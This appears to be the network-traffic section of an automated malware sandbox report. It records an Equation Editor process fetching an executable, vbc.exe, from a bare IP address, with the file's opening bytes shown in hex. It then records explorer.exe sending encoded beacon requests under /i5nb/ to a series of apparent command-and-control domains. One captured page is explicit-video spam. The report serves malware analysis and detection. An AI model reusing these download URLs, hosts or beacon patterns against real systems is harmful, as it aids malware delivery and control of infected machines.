                                                  Jan 13, 2022 20:21:56.156425953 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156429052 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156443119 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156459093 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156469107 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156500101 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156510115 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156527042 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156546116 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156569958 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156572104 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156583071 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156589031 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156601906 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156619072 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156634092 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156645060 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156651974 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156667948 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156681061 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156682968 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156713963 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156758070 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.160103083 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.270792007 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270822048 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270838976 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270857096 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270872116 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270889044 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270889997 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.270905018 CET8049167198.23.213.59192.168.2.22

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 13, 2022 20:22:49.336359024 CET5216753192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:22:49.503792048 CET53521678.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:22:54.885034084 CET5059153192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:22:54.913263083 CET53505918.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:00.037771940 CET5780553192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:00.218267918 CET53578058.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:05.811104059 CET5903053192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:05.959788084 CET53590308.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:11.327357054 CET5918553192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:11.476555109 CET53591858.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:16.774473906 CET5561653192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:17.087388039 CET53556168.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:22.669341087 CET4997253192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:22.836792946 CET53499728.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:28.536506891 CET5177153192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:28.839101076 CET53517718.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:38.849476099 CET5986753192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:39.019042969 CET53598678.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Jan 13, 2022 20:22:49.336359024 CET192.168.2.228.8.8.80xb710Standard query (0)www.orphe.bizA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:22:54.885034084 CET192.168.2.228.8.8.80x439cStandard query (0)www.circlessalaries.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:00.037771940 CET192.168.2.228.8.8.80xc18cStandard query (0)www.ylhwcl.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:05.811104059 CET192.168.2.228.8.8.80xfc43Standard query (0)www.terapiaholisticaemformacao.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:11.327357054 CET192.168.2.228.8.8.80x9c63Standard query (0)www.ecommerceoptimise.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:16.774473906 CET192.168.2.228.8.8.80x30e0Standard query (0)www.integratedheartspsychology.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:22.669341087 CET192.168.2.228.8.8.80x9037Standard query (0)www.bjbwx114.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:28.536506891 CET192.168.2.228.8.8.80xbd42Standard query (0)www.topeasyip.companyA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:38.849476099 CET192.168.2.228.8.8.80x95dcStandard query (0)www.norfg.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Jan 13, 2022 20:22:49.503792048 CET8.8.8.8192.168.2.220xb710No error (0)www.orphe.biz103.224.212.220A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:22:54.913263083 CET8.8.8.8192.168.2.220x439cNo error (0)www.circlessalaries.com195.211.74.112A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:00.218267918 CET8.8.8.8192.168.2.220xc18cNo error (0)www.ylhwcl.com122.10.28.11A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:05.959788084 CET8.8.8.8192.168.2.220xfc43No error (0)www.terapiaholisticaemformacao.comterapiaholisticaemformacao.comCNAME (Canonical name)IN (0x0001)
                                                  Jan 13, 2022 20:23:05.959788084 CET8.8.8.8192.168.2.220xfc43No error (0)terapiaholisticaemformacao.com216.172.160.188A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:11.476555109 CET8.8.8.8192.168.2.220x9c63No error (0)www.ecommerceoptimise.comecommerceoptimise.comCNAME (Canonical name)IN (0x0001)
                                                  Jan 13, 2022 20:23:11.476555109 CET8.8.8.8192.168.2.220x9c63No error (0)ecommerceoptimise.com192.185.98.251A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:17.087388039 CET8.8.8.8192.168.2.220x30e0No error (0)www.integratedheartspsychology.com221.121.143.148A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:22.836792946 CET8.8.8.8192.168.2.220x9037No error (0)www.bjbwx114.com23.80.120.93A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:28.839101076 CET8.8.8.8192.168.2.220xbd42Name error (3)www.topeasyip.companynonenoneA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:39.019042969 CET8.8.8.8192.168.2.220x95dcNo error (0)www.norfg.com43.134.0.76A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • 198.23.213.59
                                                  • www.orphe.biz
                                                  • www.circlessalaries.com
                                                  • www.ylhwcl.com
                                                  • www.terapiaholisticaemformacao.com
                                                  • www.ecommerceoptimise.com
                                                  • www.integratedheartspsychology.com
                                                  • www.bjbwx114.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.2249167198.23.213.5980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:21:55.695291996 CET0OUTGET /1155/vbc.exe HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 198.23.213.59
                                                  Connection: Keep-Alive
                                                  Jan 13, 2022 20:21:55.811695099 CET1INHTTP/1.1 200 OK
                                                  Date: Fri, 14 Jan 2022 02:21:54 GMT
                                                  Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.26
                                                  Last-Modified: Thu, 13 Jan 2022 22:04:27 GMT
                                                  ETag: "66000-5d57ddeb75e04"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 417792
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-msdownload
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 3f e0 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 56 06 00 00 08 00 00 00 00 00 00 3a 75 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 74 06 00 57 00 00 00 00 80 06 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 55 06 00 00 20 00 00 00 56 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 80 06 00 00 06 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 75 06 00 00 00 00 00 48 00 00 00 02 00 05 00 7c 46 06 00 64 2e 00 00 03 00 00 00 2d 00 00 06 f8 5d 00 00 84 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 17 00 00 0a 02 03 7d 01 00 00 04 02 28 18 00 00 0a 6f 19 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 04 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 03 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06 00 00 04 02 7b 08 00 00 04 6f 84 00 00 06 3a 71 ff ff ff 02 28 04 00 00 06 2b 08 02 28 04 00 00 06 de 12 02 14 7d 08 00 00 04 16 0a de 07 02 28 02 00 00 06 dc 06 2a 01 10 00 00 04 00 00 00 f3 f3 00 07 00 00 00 00 6e 02 15 7d 01 00 00 04 02 7b 08 00 00 04 2c 0b 02 7b 08 00 00 04 6f 63 00 00 06 2a 1e 02 7b 02 00 00 04 2a 1a 73 1a 00 00 0a 7a 00 32 02 7b 02
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH?aV:u @ @tW H.text@U V `.rsrcX@@.reloc^@BuH|Fd.-]z(}(o}*0{.3(*0{,.f}}}so}}8{o}{}}}{Y}{-+H{{X{X ;|{Xa}}{o:q(+(}(*n}{,{oc*{*sz2{


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.2249168103.224.212.22080C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:22:49.687273026 CET439OUTGET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1
                                                  Host: www.orphe.biz
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:22:49.874944925 CET440INHTTP/1.1 302 Found
                                                  Date: Thu, 13 Jan 2022 19:22:49 GMT
                                                  Server: Apache/2.4.25 (Debian)
                                                  Set-Cookie: __tad=1642101769.6856294; expires=Sun, 11-Jan-2032 19:22:49 GMT; Max-Age=315360000
                                                  Location: http://ww25.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew==&subid1=20220114-0622-493b-bd82-791d388f7025
                                                  Content-Length: 0
                                                  Connection: close
                                                  Content-Type: text/html; charset=UTF-8


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.2249169195.211.74.11280C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:22:54.941361904 CET441OUTGET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1
                                                  Host: www.circlessalaries.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:22:54.977261066 CET442INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Thu, 13 Jan 2022 19:22:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  X-Powered-By: PHP/7.2.24
                                                  Data Raw: 31 66 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 6c 61 63 65 68 6f 6c 64 65 72 20 26 6e 64 61 73 68 3b 20 41 6e 74 61 67 6f 6e 69 73 74 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6e 74 61 67 6f 6e 69 73 74 2e 6e 6c 2f 73 74 61 74 69 63 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2e 33 2e 31 2e 6d 69 6e 2e 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6e 74 61 67 6f 6e 69 73 74 2e 6e 6c 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 33 2e 34 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6c 61 6d 3a 34 30 30 7c 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6e 74 61 67 6f 6e 69 73 74 2e 6e 6c 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 32 31 35 37 3b 0a 20 20 20 20 2d 2d 70 69 6e 6b 3a 20 23 65 63 30 30 38 63 3b 0a 20 20 20 20 2d 2d 6f 72 61 6e 67 65 3a 20 23 66 66 38 34 30 30 3b 0a 20 20 20 20 2d 2d 64 61 72 6b 2d 6f 72 61 6e 67 65 3a 20 72 67 62 28 32 34 32 2c 20 38 30 2c 20 30 29 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 40 6b 65 79 66 72 61 6d 65 73 20 62 61 63 6b 67 72 6f 75 6e 64 20 7b 0a 0a 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 20 31 30 72 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 20 74 6f 70 3b 0a 20 20 20 20 7d 0a 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 2e 61 70 2d 62 74 6e 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 33 2e 35 72 65 6d 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 2e 37 35 72 65 6d 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 33 30 25 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 2e 32 35 25 3b 0a 7d 0a 0a 2e 61 70 2d 62 74 6e 20 70 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 62 6c 75 65 29 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 2e 35 72 65 6d 3b 0a 7d 0a 0a 2e 61 70 2d 62 74 6e 20 69 6d 67 20 7b 0a 20 20 20 20 77 69 64 74 68 3a
                                                  Data Ascii: 1fa8<!DOCTYPE html><html> <head> <title>Placeholder &ndash; Antagonist</title> <link rel="stylesheet" href="https://www.antagonist.nl/static/css/bootstrap/bootstrap-4.3.1.min.css"> <script src="https://www.antagonist.nl/static/js/jquery/jquery-3.4.1.min.js"></script> <link href="https://fonts.googleapis.com/css?family=Kalam:400|Open+Sans:300,400,600,700&display=swap" rel="stylesheet"> <link rel="icon" href="https://www.antagonist.nl/favicon.ico"> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>:root { --blue: #002157; --pink: #ec008c; --orange: #ff8400; --dark-orange: rgb(242, 80, 0);}</style> <style>@keyframes background { 0% { background-position-y: 10rem; } 100% { background-position-y: top; }}</style> <style>.ap-btn { background-color: white; display: inline-block; height: 3.5rem; border-radius: 1.75rem; width: 30%; margin-left: 2.25%;}.ap-btn p { color: var(--blue); display: inline; line-height: 3.5rem;}.ap-btn img { width:


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.2249170122.10.28.1180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:23:00.496769905 CET495OUTGET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1
                                                  Host: www.ylhwcl.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:00.774905920 CET496INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Thu, 13 Jan 2022 19:23:00 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 1865
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d5 c5 b1 b1 d5 d7 d5 d5 cd b6 d7 ca d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 39 35 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 2c 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 39 35 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 2c 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#31934;&#21697;&#22269;&#20135;&#95;&#20122;&#27954;&#20154;&#25104;&#22312;&#32447;,&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#28459;&#32593;&#31449;&#20813;&#36153;&#35266;&#30475;</title><meta name="keywords" content="&#31934;&#21697;&#22269;&#20135;&#95;&#20122;&#27954;&#20154;&#25104;&#22312;&#32447;,&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#28459;&#32593;&#31449;&#20813;&#36153;&#35266;&#30475;" /><meta name="description" content="&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#2

